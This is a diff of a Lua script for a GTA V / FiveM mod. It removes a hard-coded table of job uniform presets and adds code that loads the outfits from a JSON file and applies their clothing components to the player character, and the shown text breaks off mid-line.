- props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 119, 10 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 130, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 40, 5 }, - } - }, - ['Male Parking Enforcement Class B'] = { - category = 'Parking Enforcement', - ped = 'mp_m_freemode_01', - props = { - { 0, 11, 7 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 76, 11 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 130, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 40, 5 }, - } - }, - ['Male Parking Enforcement Class C'] = { - category = 'Parking Enforcement', - ped = 'mp_m_freemode_01', - props = { - { 0, 11, 7 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 75, 11 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 130, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 40, 5 }, - } - }, - ['Parking enforcement Class A'] = { - category = 'Parking Enforcement', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 19, 10 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 160, 1 }, - { 4, 35, 1 }, - { 6, 56, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 40, 5 }, - } - }, - ['Parking enforcement Class B'] = { - category = 'Parking Enforcement', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 27, 11 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 160, 1 }, - { 4, 35, 1 }, - { 6, 56, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 40, 5 }, - } - }, - ['Parking enforcement Class C'] = { - category = 'Parking Enforcement', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 26, 11 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 160, 1 }, - { 4, 35, 1 }, - { 6, 56, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 40, 5 }, - } - }, - ['Male Security Class A'] = { - category = 'Security', - ped = 'mp_m_freemode_01', - props = { - { 0, 42, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 119, 8 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 43, 1 }, - { 4, 26, 6 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 40, 1 }, - } - }, - ['Male Security Class B'] = { - category = 'Security', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 76, 8 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 43, 1 }, - { 4, 26, 6 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 40, 1 }, - } - }, - ['Male Security Class C'] = { - category = 'Security', - ped = 'mp_m_freemode_01', - props = { - { 0, 45, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 75, 8 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 43, 1 }, - { 4, 26, 6 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 40, 1 }, - } - }, - ['Female Security Class A'] = { - category = 'Security', - ped = 'mp_f_freemode_01', - props = { - { 0, 41, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 19, 8 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 9, 1 }, - { 4, 4, 10 }, - { 6, 56, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 40, 1 }, - } - }, - ['Female Security Class B'] = { - category = 'Security', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 27, 8 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 9, 1 }, - { 4, 4, 10 }, - { 6, 56, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 40, 1 }, - } - }, - ['Female Security Class C'] = { - category = 'Security', - ped = 'mp_f_freemode_01', - props = { - { 0, 44, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 26, 8 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 9, 1 }, - { 4, 4, 10 }, - { 6, 56, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 40, 1 }, - } - }, - ['Male Security Winter Uniform'] = { - category = 'Security', - ped = 'mp_m_freemode_01', - props = { - { 0, 3, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 124, 3 }, - { 3, 39, 1 }, - { 10, 1, 1 }, - { 8, 43, 1 }, - { 4, 26, 6 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 27, 7 }, - { 5, 49, 1 }, - } - }, - ['Female Security Winter Uniform'] = { - category = 'Security', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 120, 3 }, - { 3, 37, 1 }, - { 10, 1, 1 }, - { 8, 9, 1 }, - { 4, 4, 10 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 29, 7 }, - { 5, 49, 1 }, - } - }, - ['Male Armored Divison Class A'] = { - category = 'Security', - ped = 'mp_m_freemode_01', - props = { - { 0, 42, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 119, 9 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 21, 4 }, - { 4, 26, 7 }, - { 6, 55, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 40, 2 }, - } - }, - ['Male Armored Divison Class B'] = { - category = 'Security', - ped = 'mp_m_freemode_01', - props = { - { 0, 45, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 76, 9 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 21, 4 }, - { 4, 26, 7 }, - { 6, 55, 1 }, - { 7, 9, 1 }, - { 9, 5, 1 }, - { 5, 40, 4 }, - } - }, - ['Male Armored Division Class C'] = { - category = 'Security', - ped = 'mp_m_freemode_01', - props = { - { 0, 45, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 75, 9 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 21, 4 }, - { 4, 26, 7 }, - { 6, 55, 1 }, - { 7, 9, 1 }, - { 9, 5, 1 }, - { 5, 40, 4 }, - } - }, - ['Female Armored Divison Class A'] = { - category = 'Security', - ped = 'mp_f_freemode_01', - props = { - { 0, 41, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 19, 9 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 20, 4 }, - { 4, 4, 16 }, - { 6, 56, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 40, 2 }, - } - }, - ['Female Armored Divison Class B'] = { - category = 'Security', - ped = 'mp_f_freemode_01', - props = { - { 0, 44, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 27, 9 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 20, 4 }, - { 4, 4, 16 }, - { 6, 56, 1 }, - { 7, 9, 1 }, - { 9, 5, 1 }, - { 5, 40, 1 }, - } - }, - ['Female Armored Divison Class C'] = { - category = 'Security', - ped = 'mp_f_freemode_01', - props = { - { 0, 44, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 26, 9 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 20, 4 }, - { 4, 4, 16 }, - { 6, 56, 1 }, - { 7, 9, 1 }, - { 9, 5, 1 }, - { 5, 40, 1 }, - } - }, - ['Male VIP Security'] = { - category = 'Security', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 122, 1 }, - { 11, 11, 1 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 11, 1 }, - { 4, 11, 1 }, - { 6, 11, 1 }, - { 7, 39, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male Bouncer'] = { - category = 'Security', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 122, 1 }, - { 11, 19, 4 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 23, 5 }, - { 6, 11, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male Merryweather Security'] = { - category = 'Merryweather', - ped = 'mp_m_freemode_01', - props = { - { 0, 45, 5 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 19, 1 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 43, 1 }, - { 4, 50, 2 }, - { 6, 26, 1 }, - { 7, 9, 1 }, - { 9, 15, 1 }, - { 5, 49, 1 }, - } - }, - ['Female Merryweather Security'] = { - category = 'Merryweather', - ped = 'mp_f_freemode_01', - props = { - { 0, 44, 5 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 46, 1 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 9, 1 }, - { 4, 52, 2 }, - { 6, 56, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male Armored Merryweather'] = { - category = 'Merryweather', - ped = 'mp_m_freemode_01', - props = { - { 0, 45, 5 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 19, 1 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 88, 1 }, - { 4, 50, 2 }, - { 6, 52, 1 }, - { 7, 120, 1 }, - { 9, 7, 1 }, - { 5, 49, 1 }, - } - }, - ['Male Merryweather Mercenary'] = { - category = 'Merryweather', - ped = 'mp_m_freemode_01', - props = { - { 0, 7, 7 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 19, 3 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 17, 1 }, - { 4, 53, 1 }, - { 6, 36, 1 }, - { 7, 113, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female Merryweather Mercenary'] = { - category = 'Merryweather', - ped = 'mp_f_freemode_01', - props = { - { 0, 44, 7 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 46, 3 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 10, 1 }, - { 4, 55, 1 }, - { 6, 37, 1 }, - { 7, 84, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male Armored Mercenary'] = { - category = 'Merryweather', - ped = 'mp_m_freemode_01', - props = { - { 0, 45, 6 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 19, 3 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 53, 1 }, - { 6, 36, 1 }, - { 7, 2, 3 }, - { 9, 7, 2 }, - { 5, 49, 1 }, - } - }, - ['Male Black Ops Mercenary'] = { - category = 'Merryweather', - ped = 'mp_m_freemode_01', - props = { - { 0, 118, 1 }, - { 1, 26, 2 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 50, 3 }, - { 3, 97, 1 }, - { 10, 20, 1 }, - { 8, 16, 1 }, - { 4, 32, 3 }, - { 6, 26, 1 }, - { 7, 111, 1 }, - { 9, 10, 4 }, - { 5, 49, 1 }, - } - }, - ['Male Black Ops UCP Mercenary'] = { - category = 'Merryweather', - ped = 'mp_m_freemode_01', - props = { - { 0, 118, 1 }, - { 1, 26, 2 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 50, 4 }, - { 3, 18, 4 }, - { 10, 21, 1 }, - { 8, 16, 1 }, - { 4, 38, 4 }, - { 6, 36, 1 }, - { 7, 43, 2 }, - { 9, 10, 2 }, - { 5, 49, 1 }, - } - }, - ['Female Black Ops Mercenary'] = { - category = 'Merryweather', - ped = 'mp_f_freemode_01', - props = { - { 0, 117, 1 }, - { 1, 28, 2 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 43, 5 }, - { 3, 19, 1 }, - { 10, 19, 1 }, - { 8, 16, 1 }, - { 4, 31, 3 }, - { 6, 26, 1 }, - { 7, 82, 1 }, - { 9, 7, 4 }, - { 5, 1, 1 }, - } - }, - ['Female Black Ops UCP Mercenary'] = { - category = 'Merryweather', - ped = 'mp_f_freemode_01', - props = { - { 0, 117, 1 }, - { 1, 28, 2 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 43, 4 }, - { 3, 19, 4 }, - { 10, 20, 1 }, - { 8, 16, 1 }, - { 4, 37, 4 }, - { 6, 37, 1 }, - { 7, 30, 2 }, - { 9, 7, 2 }, - { 5, 1, 1 }, - } - }, - ['Male Sanitation Coveralls'] = { - category = 'Sanitation', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 72, 1 }, - { 3, 65, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 54, 1 }, - { 6, 28, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female Sanitation Coveralls'] = { - category = 'Sanitation', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 14, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 68, 1 }, - { 3, 76, 1 }, - { 10, 1, 1 }, - { 8, 15, 1 }, - { 4, 56, 1 }, - { 6, 27, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male Waste Collector'] = { - category = 'Sanitation', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 58, 1 }, - { 3, 67, 1 }, - { 10, 1, 1 }, - { 8, 60, 1 }, - { 4, 37, 1 }, - { 6, 28, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female Waste Collector'] = { - category = 'Sanitation', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 51, 1 }, - { 3, 80, 1 }, - { 10, 1, 1 }, - { 8, 37, 1 }, - { 4, 36, 1 }, - { 6, 27, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male Janitor'] = { - category = 'Sanitation', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 66, 2 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 39, 2 }, - { 6, 25, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female Janitor'] = { - category = 'Sanitation', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 60, 2 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 15, 1 }, - { 4, 39, 2 }, - { 6, 25, 1 }, - { 7, 95, 2 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male Mechanic Coveralls'] = { - category = 'Construction', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 67, 2 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 40, 2 }, - { 6, 25, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male Private Contractor'] = { - category = 'Construction', - ped = 'mp_m_freemode_01', - props = { - { 0, 26, 1 }, - { 1, 16, 10 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 57, 1 }, - { 3, 64, 1 }, - { 10, 1, 1 }, - { 8, 90, 1 }, - { 4, 1, 11 }, - { 6, 13, 1 }, - { 7, 1, 1 }, - { 9, 4, 1 }, - { 5, 49, 1 }, - } - }, - ['Female Private Contractor'] = { - category = 'Construction', - ped = 'mp_f_freemode_01', - props = { - { 0, 54, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 50, 1 }, - { 3, 73, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 5, 2 }, - { 6, 27, 1 }, - { 7, 1, 1 }, - { 9, 6, 1 }, - { 5, 49, 1 }, - } - }, - ['Male Public Worker'] = { - category = 'Construction', - ped = 'mp_m_freemode_01', - props = { - { 0, 61, 2 }, - { 1, 16, 10 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 3, 6 }, - { 3, 64, 1 }, - { 10, 1, 1 }, - { 8, 91, 1 }, - { 4, 50, 4 }, - { 6, 52, 4 }, - { 7, 1, 1 }, - { 9, 4, 3 }, - { 5, 49, 1 }, - } - }, - ['Female Public Worker'] = { - category = 'Construction', - ped = 'mp_f_freemode_01', - props = { - { 0, 61, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 118, 1 }, - { 3, 82, 1 }, - { 10, 1, 1 }, - { 8, 55, 1 }, - { 4, 5, 2 }, - { 6, 27, 1 }, - { 7, 1, 1 }, - { 9, 6, 3 }, - { 5, 49, 1 }, - } - }, - ['Male Public Worker Coveralls'] = { - category = 'Construction', - ped = 'mp_m_freemode_01', - props = { - { 0, 61, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 67, 3 }, - { 3, 67, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 40, 3 }, - { 6, 25, 1 }, - { 7, 1, 1 }, - { 9, 11, 5 }, - { 5, 1, 1 }, - } - }, - ['Female Public Worker Coveralls'] = { - category = 'Construction', - ped = 'mp_f_freemode_01', - props = { - { 0, 61, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 61, 3 }, - { 3, 76, 1 }, - { 10, 1, 1 }, - { 8, 15, 1 }, - { 4, 40, 3 }, - { 6, 27, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Male PostOp Uniform'] = { - category = 'Postal Services', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 172, 1 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 14, 5 }, - { 6, 52, 1 }, - { 7, 17, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female PostOp Uniform'] = { - category = 'Postal Services', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 21, 1 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 15, 1 }, - { 4, 100, 1 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male PostOp Bermudas'] = { - category = 'Postal Services', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 46, 1 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 13, 9 }, - { 6, 13, 13 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female Post Up polo'] = { - category = 'Postal Services', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 33, 1 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 15, 1 }, - { 4, 100, 1 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male GoPostal Uniform'] = { - category = 'Postal Services', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 172, 2 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 14, 6 }, - { 6, 52, 1 }, - { 7, 17, 2 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female GoPostal Uniform'] = { - category = 'Postal Services', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 21, 2 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 15, 1 }, - { 4, 100, 2 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male GoPostal Bermudas'] = { - category = 'Postal Services', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 46, 2 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 13, 10 }, - { 6, 13, 13 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female GoPostal polo'] = { - category = 'Postal Services', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 33, 2 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 15, 1 }, - { 4, 100, 2 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male Coroner'] = { - category = 'Health Professionals', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 36, 7 }, - { 3, 87, 2 }, - { 10, 1, 1 }, - { 8, 29, 4 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 23, 2 }, - { 5, 1, 1 }, - } - }, - ['Female Coroner'] = { - category = 'Health Professionals', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 180, 7 }, - { 3, 106, 1 }, - { 10, 1, 1 }, - { 8, 24, 2 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male Nurse'] = { - category = 'Health Professionals', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 87, 2 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 46, 2 }, - { 6, 43, 3 }, - { 7, 128, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male Patient'] = { - category = 'Bonus', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 105, 1 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 30, 1 }, - { 6, 35, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male Prisoner'] = { - category = 'Bonus', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 87, 1 }, - { 3, 1, 1 }, - { 10, 26, 1 }, - { 8, 16, 1 }, - { 4, 46, 5 }, - { 6, 43, 2 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male Prisoner Bloody'] = { - category = 'Bonus', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 87, 5 }, - { 3, 1, 1 }, - { 10, 26, 1 }, - { 8, 16, 1 }, - { 4, 46, 7 }, - { 6, 43, 2 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, -} +outfits = json.decode(LoadResourceFile(GetCurrentResourceName(), GetResourceMetadata(GetCurrentResourceName(), 'uniform_file'))) + +local function convertInput(input) + local t1 = tonumber(string.split(input, ":")[1])-1 + local t2 = tonumber(string.split(input, ":")[2])-1 + return({t1, t2}) +end local function setOutfit(outfit) - local ped = PlayerPedId() + local ped = PlayerPedId() - RequestModel(outfit.ped) + if (outfit.Gender == "Male" and GetEntityModel(ped) == GetHashKey("mp_m_freemode_01")) or (outfit.Gender == "Female" and GetEntityModel(ped) == GetHashKey("mp_f_freemode_01")) then + SetPedComponentVariation(ped, 1, convertInput(outfit.Mask)[1], convertInput(outfit.Mask)[2], 0) + SetPedComponentVariation(ped, 3, convertInput(outfit.UpperSkin)[1], convertInput(outfit.UpperSkin)[2], 0) + SetPedComponentVariation(ped, 4, convertInput(outfit.Pants)[1], convertInput(outfit.Pants)[2], 0) + SetPedComponentVariation(ped, 5, convertInput(outfit.Parachute)[1], convertInput(outfit.Parachute)[2], 0) + SetPedComponentVariation(ped, 6, convertInput(outfit.Shoes)[1], convertInput(outfit.Shoes)[2], 0) + SetPedComponentVariation(ped, 7, convertInput(outfit.Accessories)[1], convertInput(outfit.Accessories)[2], 0) + SetPedComponentVariation(ped, 8, convertInput(outfit.UnderCoat)[1], convertInput(outfit.UnderCoat)[2], 0) + SetPedComponentVariation(ped, 9, convertInput(outfit.Armor)[1], convertInput(outfit.Armor)[2], 0) + SetPedComponentVariation(ped, 10, convertInput(outfit.Decal)[1], convertInput(outfit.Decal)[2], 